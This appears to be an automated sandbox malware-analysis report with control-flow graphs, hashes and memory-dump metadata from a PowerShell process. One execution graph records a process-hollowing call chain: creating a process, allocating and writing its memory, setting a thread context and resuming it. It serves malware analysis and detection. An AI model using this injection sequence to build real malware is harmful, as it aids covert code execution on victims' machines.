                                                                                                            control_flow_graph 1221 72105f0-72105fd 1222 721066b-7210675 1221->1222 1223 72105ff-721063e 1221->1223 1224 7210680-7210686 1222->1224 1225 7210677-721067d 1222->1225 1235 7210640-721064e 1223->1235 1236 72106bb-72106c0 1223->1236 1227 7210688-721068a 1224->1227 1228 721068c-7210698 1224->1228 1229 721069a-72106b8 1227->1229 1228->1229 1239 7210656-7210665 1235->1239 1236->1235 1239->1222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7210000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dae4050dcbd90d78bf04c4adfe5264f057a97afc327dbfa4ce842927092d4890
                                                                                                            • Instruction ID: 64afaef2a6ab694416d5ba582f5b12924cf27b1992eec729296ccb88f5dcff21
                                                                                                            • Opcode Fuzzy Hash: dae4050dcbd90d78bf04c4adfe5264f057a97afc327dbfa4ce842927092d4890
                                                                                                            • Instruction Fuzzy Hash: 271159B13103156BEB245B698810B7BB7D6ABD4720F20842EE949DB3C0D972DC818796
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2205326681.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7210000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: caefb6366f4475076e4d3aeaa289ae4953523d67c193a31b55fe97203a0b1881
                                                                                                            • Instruction ID: ea9769fcbd4293f8594bc27e8cbbd2aaddae501680cfb969a97cd85200761ae0
                                                                                                            • Opcode Fuzzy Hash: caefb6366f4475076e4d3aeaa289ae4953523d67c193a31b55fe97203a0b1881
                                                                                                            • Instruction Fuzzy Hash: 1C0176F030034527EA305B6A9810B6B7AD7AFC1724F60C429F948EB3C0D9B5EC8087A6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2200979048.0000000002ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ADD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_2add000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6064f0e99f16cee1bc617c9a10fbd20df06c63481639c686d719fb153be03d68
                                                                                                            • Instruction ID: 0e7c48c74617c3b2da5bfa126768bf5576f93c7080937fb4ed54c4c5862f4651
                                                                                                            • Opcode Fuzzy Hash: 6064f0e99f16cee1bc617c9a10fbd20df06c63481639c686d719fb153be03d68
                                                                                                            • Instruction Fuzzy Hash: 8C01F772405704AAE7205F15CDC4B67BF98DF81324F58856ADD0B1A142CB789846C6B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2200979048.0000000002ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ADD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_2add000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6c1334991beadeaa330f9ac511cc24312992a0a344e67c0ff8b3b9b079ec5563
                                                                                                            • Instruction ID: 96e21ba3422375f62f8a300d958f9c8669626a912e5bb850f341527c40997808
                                                                                                            • Opcode Fuzzy Hash: 6c1334991beadeaa330f9ac511cc24312992a0a344e67c0ff8b3b9b079ec5563
                                                                                                            • Instruction Fuzzy Hash: 9D01806200E3C45FD7128B258C94B52BFB4DF42224F19C1DBD8898F193C2695849C772

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.7%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:88.5%
                                                                                                            Total number of Nodes:26
                                                                                                            Total number of Limit Nodes:1
                                                                                                            execution_graph 9313 2e487b0 9314 2e4882d 9313->9314 9315 2e48eb4 9314->9315 9337 2e472f0 9314->9337 9317 2e49095 CreateProcessW 9315->9317 9336 2e48da8 9315->9336 9318 2e49109 9317->9318 9319 2e488b8 9319->9315 9320 2e472fc Wow64SetThreadContext 9319->9320 9321 2e48923 9320->9321 9321->9315 9322 2e48a36 VirtualAllocEx 9321->9322 9321->9336 9323 2e48a83 9322->9323 9323->9315 9324 2e48ad1 VirtualAllocEx 9323->9324 9326 2e48b25 9323->9326 9324->9326 9325 2e47314 WriteProcessMemory 9327 2e48b6f 9325->9327 9326->9315 9326->9325 9326->9336 9327->9315 9328 2e48cb9 9327->9328 9335 2e47314 WriteProcessMemory 9327->9335 9327->9336 9328->9315 9329 2e47314 WriteProcessMemory 9328->9329 9330 2e48ce2 9329->9330 9330->9315 9331 2e47320 Wow64SetThreadContext 9330->9331 9330->9336 9332 2e48d57 9331->9332 9332->9315 9333 2e48d5f 9332->9333 9334 2e48d68 ResumeThread 9333->9334 9333->9336 9334->9336 9335->9327 9338 2e48fb0 CreateProcessW 9337->9338 9340 2e49109 9338->9340

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 2e487b0-2e48861 4 2e48867-2e48877 0->4 5 2e48f99-2e49029 0->5 8 2e48880 4->8 9 2e48879-2e4887e 4->9 12 2e49031-2e49038 5->12 13 2e4902b-2e4902e 5->13 11 2e48882-2e48884 8->11 9->11 14 2e48886-2e48899 11->14 15 2e4889b-2e488ba call 2e472f0 11->15 16 2e49043-2e49059 12->16 17 2e4903a-2e49040 12->17 13->12 14->15 24 2e488c3 15->24 25 2e488bc-2e488c1 15->25 18 2e49064-2e49107 CreateProcessW 16->18 19 2e4905b-2e49061 16->19 17->16 26 2e49110-2e49188 18->26 27 2e49109-2e4910f 18->27 19->18 28 2e488c5-2e488c7 24->28 25->28 48 2e4919a-2e491a1 26->48 49 2e4918a-2e49190 26->49 27->26 29 2e488cd-2e488e2 28->29 30 2e48f0f-2e48f22 28->30 35 2e488e8-2e4890c 29->35 36 2e48f0a 29->36 41 2e48f29-2e48f3f 30->41 35->41 45 2e48912-2e48925 call 2e472fc 35->45 36->30 41->5 54 2e48f41-2e48f4b 41->54 55 2e48ead-2e48eaf 45->55 56 2e4892b-2e48932 45->56 50 2e491a3-2e491b2 48->50 51 2e491b8 48->51 49->48 50->51 58 2e491b9 51->58 65 2e48f56-2e48f58 54->65 66 2e48f4d-2e48f54 54->66 59 2e48e93-2e48ea6 56->59 60 2e48938-2e48942 56->60 58->58 59->55 60->41 61 2e48948-2e48965 60->61 61->36 64 2e4896b-2e48985 call 2e47308 61->64 74 2e48eb4 64->74 75 2e4898b-2e48992 64->75 68 2e48f5a-2e48f5e 65->68 66->68 71 2e48f65-2e48f72 68->71 72 2e48f60 call 2e47f64 68->72 85 2e48f79-2e48f96 71->85 72->71 81 2e48ebb 74->81 77 2e48998-2e489a1 75->77 78 2e48e79-2e48e8c 75->78 79 2e489a3-2e489e7 77->79 80 2e48a0c-2e48a12 77->80 78->59 89 2e489f0-2e489fc 79->89 90 2e489e9-2e489ef 79->90 80->36 84 2e48a18-2e48a28 80->84 87 2e48ec5 81->87 84->36 92 2e48a2e-2e48a81 VirtualAllocEx 84->92 93 2e48ecc 87->93 89->81 94 2e48a02-2e48a06 89->94 90->89 99 2e48a83-2e48a89 92->99 100 2e48a8a-2e48aa8 92->100 98 2e48ed3 93->98 94->80 96 2e48e5f-2e48e72 94->96 96->78 102 2e48eda 98->102 99->100 100->87 103 2e48aae-2e48ab5 100->103 108 2e48ee1 102->108 106 2e48b3c-2e48b43 103->106 107 2e48abb-2e48ac2 103->107 106->98 109 2e48b49-2e48b50 106->109 107->93 110 2e48ac8-2e48acf 107->110 114 2e48eeb 108->114 111 2e48e45-2e48e58 109->111 112 2e48b56-2e48b71 call 2e47314 109->112 110->106 113 2e48ad1-2e48b23 VirtualAllocEx 110->113 111->96 112->102 121 2e48b77-2e48b7e 112->121 116 2e48b25-2e48b2b 113->116 117 2e48b2c-2e48b36 113->117 120 2e48ef2 114->120 116->117 117->106 126 2e48ef9 120->126 124 2e48b84-2e48b8d 121->124 125 2e48e2b-2e48e3e 121->125 124->36 127 2e48b93-2e48b99 124->127 125->111 130 2e48f03 126->130 127->36 128 2e48b9f-2e48baa 127->128 128->36 133 2e48bb0-2e48bb6 128->133 130->36 134 2e48bbc-2e48bc1 133->134 135 2e48cb9-2e48cca 133->135 134->36 136 2e48bc7-2e48bda 134->136 135->36 139 2e48cd0-2e48ce4 call 2e47314 135->139 136->36 140 2e48be0-2e48bf3 136->140 139->120 144 2e48cea-2e48cf1 139->144 140->36 145 2e48bf9-2e48c0e 140->145 146 2e48df7-2e48e0a 144->146 147 2e48cf7-2e48cfd 144->147 145->108 152 2e48c14-2e48c18 145->152 161 2e48e11-2e48e24 146->161 147->36 148 2e48d03-2e48d14 147->148 148->126 153 2e48d1a-2e48d1e 148->153 154 2e48c1e-2e48c27 152->154 155 2e48c9f-2e48ca2 152->155 157 2e48d20-2e48d23 153->157 158 2e48d29-2e48d31 153->158 154->36 160 2e48c2d-2e48c30 154->160 155->36 159 2e48ca8-2e48cab 155->159 157->158 158->36 162 2e48d37-2e48d41 158->162 159->36 163 2e48cb1-2e48cb3 159->163 160->36 164 2e48c36-2e48c66 160->164 161->125 162->41 165 2e48d47-2e48d59 call 2e47320 162->165 163->134 163->135 164->36 175 2e48c6c-2e48c85 call 2e47314 164->175 165->130 171 2e48d5f-2e48d66 165->171 173 2e48dc3-2e48dd6 171->173 174 2e48d68-2e48da6 ResumeThread 171->174 181 2e48ddd-2e48df0 173->181 177 2e48daf-2e48dbc 174->177 178 2e48da8-2e48dae 174->178 180 2e48c8a-2e48c8c 175->180 177->181 182 2e48dbe-2e48f74 177->182 178->177 180->114 183 2e48c92-2e48c99 180->183 181->146 182->85 183->155 183->161
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 02E48A6A
                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 02E48B0C
                                                                                                              • Part of subcall function 02E47314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,187A2514,00000000,?,?,?,00000000,00000000,?,02E48B6F,?,00000000,?), ref: 02E493E4
                                                                                                            • ResumeThread.KERNELBASE(?), ref: 02E48D8F
                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 02E490F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 4270437565-0
                                                                                                            • Opcode ID: 18adfcbd63f171658df6ec5e8af23afc3221f6bc2d2be2e649a480cf2b58dd85
                                                                                                            • Instruction ID: 8db51b3e1ea7e71b5d9ca5fc0d9c27c1fff20c1a10d713d065be091ef9bc2ca2
                                                                                                            • Opcode Fuzzy Hash: 18adfcbd63f171658df6ec5e8af23afc3221f6bc2d2be2e649a480cf2b58dd85
                                                                                                            • Instruction Fuzzy Hash: 43427C70A00219CFEB64DF69DC50BAEB7B2AF84308F14C1A9D909AB290DF759D85CF51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 412 2e47fcd-2e482a5 413 2e482a7-2e482a9 412->413 414 2e482ae-2e482be 412->414 415 2e4857a-2e48581 413->415 416 2e482c5-2e482d5 414->416 417 2e482c0 414->417 419 2e48561-2e4856f 416->419 420 2e482db-2e482e9 416->420 417->415 423 2e48571-2e48575 call 2e41758 419->423 424 2e48582-2e485f9 419->424 420->424 425 2e482ef 420->425 423->415 425->424 427 2e48385-2e483a6 425->427 428 2e484e6-2e48512 425->428 429 2e4844a-2e48472 425->429 430 2e483ab-2e483cc 425->430 431 2e48514-2e4852f call 2e40318 425->431 432 2e48555-2e4855f 425->432 433 2e482f6-2e48305 425->433 434 2e483f7-2e48418 425->434 435 2e48477-2e484b6 425->435 436 2e483d1-2e483f2 425->436 437 2e48531-2e48553 425->437 438 2e4841d-2e48445 425->438 439 2e4835e-2e48380 425->439 440 2e48338-2e48359 425->440 441 2e484bb-2e484e1 425->441 427->415 428->415 429->415 430->415 431->415 432->415 459 2e48307-2e4831c 433->459 460 2e4831e-2e4832d 433->460 434->415 435->415 436->415 437->415 438->415 439->415 440->415 441->415 484 2e48333 459->484 460->484 484->415
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c992183dd78bebdd50188408a952df775eb5d5bb5f70ab3e8b830dbe60a7e39e
                                                                                                            • Instruction ID: 91a81452e10c047102b27e7a6ce3cda09616d2f560478a54e85632e1b6c96599
                                                                                                            • Opcode Fuzzy Hash: c992183dd78bebdd50188408a952df775eb5d5bb5f70ab3e8b830dbe60a7e39e
                                                                                                            • Instruction Fuzzy Hash: 65916D34F44218CBDB48DB74A8547BE7BA3BBC4700F19C56AE546E7384CE389C528B95

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 189 2e472f0-2e49029 191 2e49031-2e49038 189->191 192 2e4902b-2e4902e 189->192 193 2e49043-2e49059 191->193 194 2e4903a-2e49040 191->194 192->191 195 2e49064-2e49107 CreateProcessW 193->195 196 2e4905b-2e49061 193->196 194->193 198 2e49110-2e49188 195->198 199 2e49109-2e4910f 195->199 196->195 206 2e4919a-2e491a1 198->206 207 2e4918a-2e49190 198->207 199->198 208 2e491a3-2e491b2 206->208 209 2e491b8 206->209 207->206 208->209 211 2e491b9 209->211 211->211
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 02E490F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 777690d1a011868e854cc9da45fa23fe91a48658b19e41d56f5b46992883cfe0
                                                                                                            • Instruction ID: 356590534c5fcced9a89475e65eefd29b0f51d7108cd607bd2c0d8a719d6b02c
                                                                                                            • Opcode Fuzzy Hash: 777690d1a011868e854cc9da45fa23fe91a48658b19e41d56f5b46992883cfe0
                                                                                                            • Instruction Fuzzy Hash: 38511A7190121ADFDB24CF99D944BDEBBB5BF48304F0185AAE909B7240DB759A84CFA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 212 2e49360-2e493ae 214 2e493b0-2e493b6 212->214 215 2e493b8-2e493f1 WriteProcessMemory 212->215 214->215 216 2e493f3-2e493f9 215->216 217 2e493fa-2e4941b 215->217 216->217
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,187A2514,00000000,?,?,?,00000000,00000000,?,02E48B6F,?,00000000,?), ref: 02E493E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 176c87b59f0fc026bf6a8fd1f2ebec40661cd042f0e91ef937e873e22074569e
                                                                                                            • Instruction ID: 275d73e48ced51963442539c3d0a9cbbfc0719ae000add76dc2c61d7ae5ecf07
                                                                                                            • Opcode Fuzzy Hash: 176c87b59f0fc026bf6a8fd1f2ebec40661cd042f0e91ef937e873e22074569e
                                                                                                            • Instruction Fuzzy Hash: 032125B19003499FDB10CFAAD884BDEBBF8FB09324F50842AE518B7241D378A544CFA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 219 2e47314-2e493ae 221 2e493b0-2e493b6 219->221 222 2e493b8-2e493f1 WriteProcessMemory 219->222 221->222 223 2e493f3-2e493f9 222->223 224 2e493fa-2e4941b 222->224 223->224
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,187A2514,00000000,?,?,?,00000000,00000000,?,02E48B6F,?,00000000,?), ref: 02E493E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 5bcf24d192cc85eec2db461be8a5c2eb339bcc05b10af25324b2ea8b7037dd07
                                                                                                            • Instruction ID: a15ebe891ea4b763ddee95ea1ce89dfb0859b5c835399a90de1097b8d2b1f394
                                                                                                            • Opcode Fuzzy Hash: 5bcf24d192cc85eec2db461be8a5c2eb339bcc05b10af25324b2ea8b7037dd07
                                                                                                            • Instruction Fuzzy Hash: AF2109B1900309DFDB10DF99D985BDEBBF4FB49314F508429E514B7241D3789944CBA4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 226 2e472fc-2e49230 228 2e49232-2e4923a 226->228 229 2e4923c-2e49268 Wow64SetThreadContext 226->229 228->229 230 2e49271-2e49292 229->230 231 2e4926a-2e49270 229->231 231->230
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02E48923), ref: 02E4925B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 0059bc607035cce4230a5df939adc57d823be46898a6139e85538b080d45b70d
                                                                                                            • Instruction ID: 9cae3168a90299963327b5793d0e8f73aba3b86f22c0325e309128b900fbd87b
                                                                                                            • Opcode Fuzzy Hash: 0059bc607035cce4230a5df939adc57d823be46898a6139e85538b080d45b70d
                                                                                                            • Instruction Fuzzy Hash: 561144B19002098FCB10CFAAE844BDFBBF4EB88224F158029E818B3201D778A545CFA4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 233 2e47320-2e49230 235 2e49232-2e4923a 233->235 236 2e4923c-2e49268 Wow64SetThreadContext 233->236 235->236 237 2e49271-2e49292 236->237 238 2e4926a-2e49270 236->238 238->237
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02E48923), ref: 02E4925B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: d3bca6eed7b671d4faeb029823ab8dedf610cba56ffe13294f3765607b6a781f
                                                                                                            • Instruction ID: c73b29091e822b9831f3a6dae8a302e1aebf4d0afbf4a6c109c68abd1c892ab9
                                                                                                            • Opcode Fuzzy Hash: d3bca6eed7b671d4faeb029823ab8dedf610cba56ffe13294f3765607b6a781f
                                                                                                            • Instruction Fuzzy Hash: 291126B1D007098FDB10DFAAD845BDFBBF4EB88224F158069E818B3241D778A545CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 240 2e491e8-2e49230 242 2e49232-2e4923a 240->242 243 2e4923c-2e49268 Wow64SetThreadContext 240->243 242->243 244 2e49271-2e49292 243->244 245 2e4926a-2e49270 243->245 245->244
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02E48923), ref: 02E4925B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432261733.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e40000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 734d244ac6da1ad56fb3a35c477d1e358ada9a6cb96ed8599e21b45cad4819a5
                                                                                                            • Instruction ID: 00b9d646fd17800bb9815e32672245019039866ab44ff6e5ed4ba2e7e58086b7
                                                                                                            • Opcode Fuzzy Hash: 734d244ac6da1ad56fb3a35c477d1e358ada9a6cb96ed8599e21b45cad4819a5
                                                                                                            • Instruction Fuzzy Hash: BB1147B1C002498FDB20CFAAD444BDEFBF5EB88224F148529D458B3201D7789545CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 814 7601f18-7601f3a 815 7601f40-7601f45 814->815 816 76020b7-76020d5 814->816 817 7601f47-7601f4d 815->817 818 7601f5d-7601f69 815->818 822 7602122-7602123 816->822 823 76020d7-76020d9 816->823 819 7601f51-7601f5b 817->819 820 7601f4f 817->820 829 7602062-760206c 818->829 830 7601f6f-7601f72 818->830 819->818 820->818 825 7602125 822->825 827 7602126 823->827 828 76020db-7602102 823->828 825->827 831 7602128-7602129 827->831 832 760213c-7602146 827->832 833 7602108-760210d 828->833 834 760225d-7602279 828->834 835 760207a-7602080 829->835 836 760206e-7602077 829->836 830->829 837 7601f78-7601f7f 830->837 838 7602208-7602212 831->838 839 760212a-7602133 831->839 832->834 840 760214c-7602151 832->840 833->825 841 760210f-7602115 833->841 859 76022c6 834->859 860 760227b-76022a2 834->860 842 7602082-7602084 835->842 843 7602086-7602092 835->843 837->816 844 7601f85-7601f8a 837->844 852 7602220-7602226 838->852 853 7602214-760221d 838->853 847 7602173 839->847 848 7602134-7602135 839->848 849 7602153-7602159 840->849 850 7602169-7602171 840->850 854 7602117 841->854 855 7602119 841->855 856 7602094-76020b4 842->856 843->856 845 7601fa2-7601fa6 844->845 846 7601f8c-7601f92 844->846 845->829 865 7601fac-7601fb0 845->865 863 7601f94 846->863 864 7601f96-7601fa0 846->864 861 7602175-7602177 847->861 848->832 857 760215b 849->857 858 760215d-7602167 849->858 850->861 866 7602228-760222a 852->866 867 760222c-7602238 852->867 854->825 855->822 857->850 858->850 871 76022c8-76022c9 859->871 872 76022dc-76022e1 859->872 868 76022a8-76022ad 860->868 869 760244c-7602454 860->869 861->838 870 760217d-7602181 861->870 863->845 864->845 874 7601fd0 865->874 875 7601fb2-7601fce 865->875 876 760223a-760225a 866->876 867->876 878 76022c5 868->878 879 76022af-76022b5 868->879 899 7602456-760247c 869->899 900 760248d-760249b 869->900 870->838 881 7602187-7602196 870->881 882 76023f4-76023fe 871->882 883 76022ca-76022d0 871->883 885 76022e2-76022e3 872->885 886 7601fd2-7601fd4 874->886 875->886 878->859 889 76022b7 879->889 890 76022b9-76022c3 879->890 915 7602198-760219e 881->915 916 76021ae-7602205 881->916 893 7602400-7602409 882->893 894 760240c-7602412 882->894 883->885 891 76022d2-76022d3 883->891 896 76022e5-76022e6 885->896 897 76022e9-76022f1 885->897 886->829 898 7601fda-7601fe7 886->898 889->878 890->878 902 7602313 891->902 903 76022d5-76022da 891->903 904 7602414-7602416 894->904 905 7602418-7602424 894->905 896->869 906 76022e7 896->906 907 76022f3-76022f9 897->907 908 7602309-7602311 897->908 932 7601fee-7601ff0 898->932 912 76024b5-76024bf 899->912 913 760247e-760248a 899->913 934 7602505-760250a 900->934 935 760249d-76024af 900->935 910 7602315-7602317 902->910 903->872 918 7602426-7602449 904->918 905->918 906->897 919 76022fb 907->919 920 76022fd-7602307 907->920 908->910 910->882 921 760231d-7602321 910->921 923 76024c1-76024c5 912->923 924 76024c8-76024ce 912->924 913->900 925 76021a0 915->925 926 76021a2-76021a4 915->926 919->908 920->908 921->882 933 7602327-760232b 921->933 936 76024d0-76024d2 924->936 937 76024d4-76024e0 924->937 925->916 926->916 938 7601ff2-7601ff8 932->938 939 7602008-760205f 932->939 933->882 940 7602331-7602357 933->940 934->935 935->912 941 76024e2-7602502 936->941 937->941 943 7601ffa 938->943 944 7601ffc-7601ffe 938->944 940->882 952 760235d-7602361 940->952 943->939 944->939 953 7602363-760236c 952->953 954 7602384 952->954 955 7602373-7602380 953->955 956 760236e-7602371 953->956 957 7602387-7602394 954->957 958 7602382 955->958 956->958 960 760239a-76023f1 957->960 958->957
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7600000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7ed6970b497302cfdc469c5bbc7635d58b3369f171c1aa6ce3055f875b5d2970
                                                                                                            • Instruction ID: 1e6cbbfb28560705f52550efd162197776a7df5a5dd760aafc02baffd7a20a2c
                                                                                                            • Opcode Fuzzy Hash: 7ed6970b497302cfdc469c5bbc7635d58b3369f171c1aa6ce3055f875b5d2970
                                                                                                            • Instruction Fuzzy Hash: A4F1E4B1B0420ADFDB1D9F74D8687ABBBA1BF85310F1480AAD6568B391DB31C846C7D1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 962 76013a0-76013c6 963 7601572-7601578 962->963 964 76013cc-76013d1 962->964 972 76015b1 963->972 973 760157a-7601584 963->973 965 76013d3-76013d9 964->965 966 76013e9-76013ed 964->966 970 76013db 965->970 971 76013dd-76013e7 965->971 968 76013f3-76013f5 966->968 969 760151e-7601528 966->969 974 7601405 968->974 975 76013f7-7601403 968->975 976 7601536-760153c 969->976 977 760152a-7601533 969->977 970->966 971->966 983 76015b3-76015ba 972->983 984 76015bb-76015c5 972->984 985 7601586-760158d 973->985 986 760159b-76015b0 973->986 980 7601407-7601409 974->980 975->980 981 7601542-760154e 976->981 982 760153e-7601540 976->982 980->969 987 760140f-7601413 980->987 988 7601550-760156f 981->988 982->988 983->984 989 76016ec-76016f4 983->989 990 76015c7-76015cd 984->990 991 76015dd-76015e1 984->991 994 76015da-76015db 985->994 995 760158f-7601599 985->995 986->972 996 7601415-7601424 987->996 997 7601426 987->997 1008 76016f6-760171d 989->1008 1009 760172d 989->1009 999 76015d1 990->999 1000 76015cf 990->1000 992 76015e7-76015e9 991->992 993 760169e-76016a8 991->993 1002 76015f9 992->1002 1003 76015eb-76015f7 992->1003 1004 76016b5-76016bb 993->1004 1005 76016aa-76016b2 993->1005 994->991 995->986 1006 7601428-760142a 996->1006 997->1006 999->994 1000->991 1010 76015fb-76015fd 1002->1010 1003->1010 1011 76016c1-76016cd 1004->1011 1012 76016bd-76016bf 1004->1012 1006->969 1013 7601430-7601432 1006->1013 1008->1009 1028 760171f-760172b 1008->1028 1016 760172f-7601731 1009->1016 1010->993 1015 7601603-7601605 1010->1015 1017 76016cf-76016e9 1011->1017 1012->1017 1018 7601442 1013->1018 1019 7601434-7601440 1013->1019 1021 7601607-760160d 1015->1021 1022 760161f-760162a 1015->1022 1023 7601733-7601752 1016->1023 1024 760179f-76017a9 1016->1024 1026 7601444-7601446 1018->1026 1019->1026 1029 7601611-760161d 1021->1029 1030 760160f 1021->1030 1047 7601642-760169b 1022->1047 1048 760162c-7601632 1022->1048 1058 7601762 1023->1058 1059 7601754-7601760 1023->1059 1031 76017b2-76017b8 1024->1031 1032 76017ab-76017af 1024->1032 1026->969 1027 760144c-760144e 1026->1027 1034 7601450-7601456 1027->1034 1035 7601468-7601473 1027->1035 1028->1016 1029->1022 1030->1022 